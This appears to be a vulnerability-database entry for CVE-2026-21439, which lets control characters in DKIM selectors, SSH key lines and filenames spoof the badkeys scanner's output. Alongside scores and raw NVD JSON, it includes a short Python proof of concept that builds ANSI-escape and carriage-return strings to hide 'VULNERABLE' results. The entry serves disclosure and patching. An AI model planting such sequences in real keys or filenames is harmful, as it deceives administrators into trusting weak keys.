CVE-2026-21439

Description

badkeys is a tool and library for checking cryptographic public keys for known vulnerabilities. In versions 0.0.15 and below, an attacker may inject content with ASCII control characters like vertical tabs, ANSI escape sequences, etc., that can create misleading output of the badkeys command-line tool. This impacts scanning DKIM keys (both --dkim and --dkim-dns), SSH keys (--ssh-lines mode), and filenames in various modes. This issue is fixed in version 0.0.16.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:badkeys:badkeys:*:*:*:*:*:python:*:* - VULNERABLE

badkeys <= 0.0.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-21439 PoC - badkeys Output Injection
This PoC demonstrates how control characters can be injected into badkeys output
to create misleading results.
"""

def generate_malicious_dkim_key():
    """
    Generate a DKIM key with injected control characters
    that can manipulate badkeys output display.
    """
    # ANSI escape sequence to turn text green (appears as "OK")
    ansi_green = '\x1b[32m'
    ansi_reset = '\x1b[0m'
    
    # Malicious selector name that will display as "VULNERABLE" 
    # but may appear as "OK" due to escape sequence injection
    malicious_selector = (
        f"vulnerable{ansi_green}OK{ansi_reset}"
        "\x0b\x0c"  # Vertical tab and form feed
    )
    
    return malicious_selector

def generate_malicious_filename():
    """
    Generate filenames with control characters that can
    manipulate terminal output in badkeys --ssh-lines mode.
    """
    # Use carriage return to overwrite previous output
    malicious_name = "safe_key\rVULNERABLE   "
    return malicious_name

def generate_ansi_overlay():
    """
    Generate content that uses ANSI sequences to overlay
    error messages with success messages.
    """
    # Move cursor up and overwrite line
    overlay = "\x1b[1A" + "\x1b[K" + "All checks passed!"
    return overlay

if __name__ == "__main__":
    print("=== CVE-2026-21439 PoC ===")
    print("\nGenerating malicious inputs for badkeys:\n")
    
    print("1. Malicious DKIM selector:")
    print(f"   {repr(generate_malicious_dkim_key())}")
    
    print("\n2. Malicious filename:")
    print(f"   {repr(generate_malicious_filename())}")
    
    print("\n3. ANSI overlay sequence:")
    print(f"   {repr(generate_ansi_overlay())}")
    
    print("\n[!] These control characters can be embedded in:")
    print("    - DKIM keys (--dkim, --dkim-dns modes)")
    print("    - SSH keys (--ssh-lines mode)")
    print("    - File names in various modes")
    print("\n[!] Impact: Misleading output, hidden vulnerabilities")
    print("[!] Fix: Upgrade to badkeys >= 0.0.16")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21439
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21439
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21439/
[4] VulDB https://vuldb.com/cve/CVE-2026-21439
[5] https://github.com/badkeys/badkeys/commit/635a2f3b1b50a895d8b09ec8629efc06189f349a
[6] https://github.com/badkeys/badkeys/commit/de631f69f040974bb5fb442cdab9a1d904c64087
[7] https://github.com/badkeys/badkeys/issues/40
[8] https://github.com/badkeys/badkeys/security/advisories/GHSA-wjpc-4f29-83h3
[9] https://github.com/badkeys/badkeys/issues/40

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21439", "sourceIdentifier": "[email protected]", "published": "2026-01-06T00:15:49.027", "lastModified": "2026-01-12T18:18:59.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "badkeys is a tool and library for checking cryptographic public keys for known vulnerabilities. In versions 0.0.15 and below, an attacker may inject content with ASCII control characters like vertical tabs, ANSI escape sequences, etc., that can create misleading output of the badkeys command-line tool. This impacts scanning DKIM keys (both --dkim and --dkim-dns), SSH keys (--ssh-lines mode), and filenames in various modes. This issue is fixed in version 0.0.16."}, {"lang": "es", "value": "badkeys es una herramienta y biblioteca para verificar claves públicas criptográficas en busca de vulnerabilidades conocidas. En las versiones 0.0.15 e inferiores, un atacante podría inyectar contenido con caracteres de control ASCII como tabulaciones verticales, secuencias de escape ANSI, etc., que pueden generar una salida engañosa de la herramienta de línea de comandos badkeys. Esto afecta el escaneo de claves DKIM (tanto --dkim como --dkim-dns), claves SSH (modo --ssh-lines), y nombres de archivo en varios modos. Este problema está solucionado en la versión 0.0.16."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-150"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:badkeys:badkeys:*:*:*:*:*:python:*:*", "versionEndExcluding": "0.0.16", "matchCriteriaId": "AA459E08-D598-4832-942C-FF493A471141"}]}]}], "references": [{"url": "https://github.com/badkeys/badkeys/commit/635a2f3b1b50a895d8b09ec8629efc06189f349a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/badkeys/badkeys/commit/de631f69f040974bb5fb442cdab9a1d904c64087", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/badkeys/badkeys/issues/40", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/badkeys/badkeys/security/advisories/GHSA-wjpc-4f29-83h3", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/badkeys/badkeys/issues/40", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}